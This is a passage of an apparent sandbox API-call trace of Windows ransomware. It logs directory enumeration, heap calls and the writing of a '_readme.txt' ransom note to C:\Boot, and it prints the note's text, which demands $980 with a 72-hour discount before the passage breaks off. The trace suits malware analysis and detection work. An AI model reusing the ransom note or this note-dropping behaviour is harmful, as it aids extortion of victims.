ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceca8 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceca8 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0200.685] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87d58660, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x87d7e7c0, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x87d7e7c0, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.685] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.685] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x3314d10 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4558 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4c10 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4580 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4cd8 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceca8 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4e68 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4e90 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92c8 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9318 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9228 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3294350 | out: hHeap=0x2c0000) returned 1 [0200.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.687] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0x889655c0, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x889655c0, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x889655c0, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0200.687] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0x889655c0, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x889655c0, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x889655c0, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0200.687] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0218 [0200.687] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.689] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.692] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.692] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.692] PathFindFileNameW (pszPath="") returned="" [0200.692] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.692] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.692] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x336f4d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.692] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.692] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0200.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0200.692] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0200.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b65058 [0200.693] lstrcpyW (in: lpString1=0x3b65058, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or 